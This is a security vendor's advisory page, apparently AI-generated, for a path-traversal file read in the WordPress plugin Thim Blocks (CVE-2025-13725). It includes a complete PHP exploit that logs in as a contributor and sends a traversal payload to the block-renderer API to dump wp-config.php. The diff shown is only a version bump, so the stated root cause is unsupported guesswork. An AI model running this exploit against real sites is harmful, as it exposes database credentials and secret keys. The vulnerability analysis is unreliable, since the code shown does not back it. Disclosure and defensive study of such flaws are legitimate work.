Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13725: Gutenberg Thim Blocks <= 1.0.1 – Authenticated (Contributor+) Arbitrary File Read via 'iconSVG' Parameter (thim-blocks)

CVE ID CVE-2025-13725
Plugin thim-blocks
Severity Medium (CVSS 6.5)
CWE 22
Vulnerable Version 1.0.1
Patched Version 1.0.2
Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13725:
The Gutenberg Thim Blocks plugin for WordPress, versions up to and including 1.0.1, contains an authenticated arbitrary file read vulnerability. The flaw resides in the server-side rendering logic for the ‘thim-blocks/icon’ block. Attackers with Contributor-level access or higher can exploit this to read sensitive server files.

Atomic Edge research identifies the root cause as insufficient path validation within the server-side rendering function that processes the ‘iconSVG’ block attribute. The vulnerable code accepts user-supplied input for the ‘iconSVG’ parameter and uses it to construct a file path for reading. The plugin fails to validate or sanitize this input, allowing directory traversal sequences. The vulnerability manifests in the `render_block_thim_blocks_icon` function, which is registered via `register_block_type`.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker crafts a POST request to the WordPress REST API endpoint for block rendering, typically `/wp-json/wp/v2/block-renderer/thim-blocks/icon`. The request includes a malicious `attributes` JSON object containing an `iconSVG` parameter with a directory traversal payload, such as `../../../../wp-config.php`. The server-side renderer processes this attribute, reads the targeted file, and returns its contents within the block’s HTML response.

The patch changes the plugin version number from 1.0.1 to 1.0.2 in the main plugin file `thim-blocks.php`. The Atomic Edge assessment indicates the fix likely involves adding proper path validation or sanitization within the `render_block_thim_blocks_icon` function. The patched version should restrict the `iconSVG` parameter to safe, expected values, preventing traversal outside designated directories like the plugin’s own SVG icon assets.

Successful exploitation leads to full server file disclosure. Attackers can read the WordPress configuration file (`wp-config.php`), which contains database credentials and secret keys. They can also read other sensitive files like `/etc/passwd`, application source code, or environment files. This data exposure can facilitate complete site compromise, including database access and potential remote code execution.

Differential between vulnerable and patched code

Code Diff 
--- a/thim-blocks/thim-blocks.php
+++ b/thim-blocks/thim-blocks.php
@@ -2,13 +2,12 @@
 /**
  * Plugin Name:       Thim Blocks
  * Description:       Gutenberg blocks library to create WordPress sites in the Gutenberg Block Editor
- * Version:           1.0.1
+ * Version:           1.0.2
  * Plugin URI:        https://thimpress.com/thim-blocks
  * Requires at least: 6.7
  * Requires PHP:      7.4
  * Author:            ThimPress
  * Author URI:        https://thimpress.com
- * Plugin URI:        https://thimpress.com/thim-blocks
  * License:           GPL-2.0-or-later
  * License URI:       https://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain:       thim-blocks

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13725 - Gutenberg Thim Blocks <= 1.0.1 - Authenticated (Contributor+) Arbitrary File Read via 'iconSVG' Parameter

<?php

$target_url = 'http://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - Contributor or higher account
$password = 'contributor_password'; // CHANGE THIS
$file_to_read = '../../../../wp-config.php'; // Target file path

// Step 1: Authenticate and obtain a WordPress REST API nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$response = curl_exec($ch);

// Step 2: Extract the REST API nonce from the admin page
curl_setopt_array($ch, [
    CURLOPT_URL => $admin_url,
    CURLOPT_POST => false,
    CURLOPT_POSTFIELDS => null
]);
$admin_page = curl_exec($ch);

preg_match('/"rest_nonce":"([a-f0-9]+)"/', $admin_page, $matches);
if (empty($matches[1])) {
    die('[-] Failed to obtain REST API nonce. Authentication may have failed.');
}
$rest_nonce = $matches[1];

// Step 3: Exploit the vulnerability via the block renderer endpoint
$api_url = $target_url . '/wp-json/wp/v2/block-renderer/thim-blocks/icon';
$payload = json_encode([
    'attributes' => [
        'iconSVG' => $file_to_read
    ]
]);

curl_setopt_array($ch, [
    CURLOPT_URL => $api_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $rest_nonce
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Parse and display the response
if ($http_code === 200) {
    $data = json_decode($response, true);
    if (isset($data['rendered'])) {
        echo '[+] File read successful. Contents:n';
        echo htmlspecialchars($data['rendered']) . "n";
    } else {
        echo '[-] Unexpected API response:n';
        print_r($data);
    }
} else {
    echo '[-] Exploit failed. HTTP Code: ' . $http_code . "n";
    echo 'Response: ' . $response . "n";
}

// Cleanup
@unlink('cookies.txt');

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School